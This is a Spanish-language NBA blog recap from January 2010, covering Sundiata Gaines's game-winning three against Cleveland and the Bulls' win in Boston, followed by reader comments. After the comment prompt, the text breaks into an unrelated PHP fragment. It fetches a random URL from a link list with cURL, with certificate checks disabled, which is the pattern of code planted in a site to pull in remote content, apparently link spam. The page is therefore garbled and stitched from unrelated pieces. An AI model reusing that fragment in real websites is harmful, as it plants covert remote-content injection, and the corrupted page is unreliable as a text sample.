La Crónica (14/01/2010)

15 de January de 2010 por TheDeerHunter

“Gaines Wins It!!”

La frase con la que hoy abre la ESPN, por la que no hubiera apostado nadie un minuto antes de que sucediera y que ilustra una de las mayores sorpresas de la primera mitad de liga. ¿Quien conoce a Sundiata Gaines? Hasta anoche poquita gente. El primer triple de su carrera NBA , en la cara del mejor especialista defensivo de perímetro de Cleveland, Delonte West, han obrado para saltar a la palestra de la mejor forma posible. Antes de eso LeBron había ejercido de si mismo, masacrando a los Jazz con 28 puntos sólamente en la segunda parte, para un total de 36 rubricando una monstruosa producción en todas las categorías estadísticas. No lo suficiente para tumbar a unos Jazz sin Deron Williams. El errático ritmo de los grandes esta atípica campaña.

Y es que los Cavs no fueron los únicos “cocos” que cayeron derrotados. Los Bulls rememoraron la serie del año pasado tumbando a los Celtics en el Garden de Boston. Por el bando local no eran de la partida ni Garnett ni Rasheed Wallace y lo cierto es que no llegaron a sentirse cómodos en ningún momento. Un partido muy completo de los Bulls, en especial, de Luol Deng. Notable en su defensa sobre  Pierce y también en ataque.

PREMIOS TJNBA:

MVP: 19 puntos, 16 rebotes,  6 asistencias para Boozer y 25 puntos, 2 rebotes, 2 tapones , 2 robos y 4 asistencias para Luol Deng. Nos quedamos con el “toro” británico por el gran trabajo que hizo sobre Paul Pierce, y que no se recoge en estadística alguna.

Rookie: El nombre del día es Sundiata Gaines, por supuesto (qué nombre tan molón para un jugador de baloncesto ¿no?) pero en realidad el mejor rookie de la jornada fue Taj Gibson, con 14 puntos, 6 rebotes, 2 tapones, 2 robos y 2 asistencias. Está logrando hacer natural la suplencia de Tyrus Thomas.

La sorpresa: ¿hay que decirlo?

La decepción: El juego interior de los Cleveland Cavaliers con graves problemas. Shaq+Ilgauskas= 6 puntos (2 de 8), 6 rebotes.

El mayor esfuerzo en vano. LeBron James registró 36 puntos, 9 rebotes, 6 asistencias y 5 robos. La carica que se le quedaría cuando vio entrar el triplaco de Gaines.

Comenta

6 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Sigo pensando que los Cavs deberían traspasar a Shaq. Yo lo empaquetaría camino de Washintong a cambio de Jamison con ojitos cerrados.

    Un saludo,
    Pablo

      Citar

  2. sergio dice:
    #2

    Yo tambien lo mandaria… pero el estupido seria el manager de Washington por no sacar mas partido de la
    “unica” estrella que le queda…

    Menudo triple… en toda la careta que diria aquel. Si hasta parece un triplista de toda la vida con esa mecacnica a lo Ray Allen/Lewis

      Citar

  3. Txusma dice:
    #3

    Todos nos merecemos tener un minuto de gloria en esta vida. Sundiata ya obtuvo el suyo…

      Citar

  4. Txusma dice:
    #4

    Y habéis el canastón en la jugada anterior de Korver??

      Citar

  5. Toni dice:
    #5

    Canaston a lo Kobe-LeBron, impresionante y si encima en la jugada siguiente llega el nuevo que “no conoce nadie” (porque es el hombre del día) enchufa un triple sobre la bocina desde su casa en una posesión que parecía la patata caliente, nadie la queria pues… Y todo esto sin el mejor jugador del equipo, Deron… ¡Viva la épica!

      Citar

  6. sergio dice:
    #6

    Precioso articulo el de la pagina de la NBA sobre los mejores atletas de la historia de la competicion. Atentos a las marcas en atletismo del nº 1 de la lista:

    http://www.nba.com/2010/news/features/steve_aschburner/01/08/athletes/index.html

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>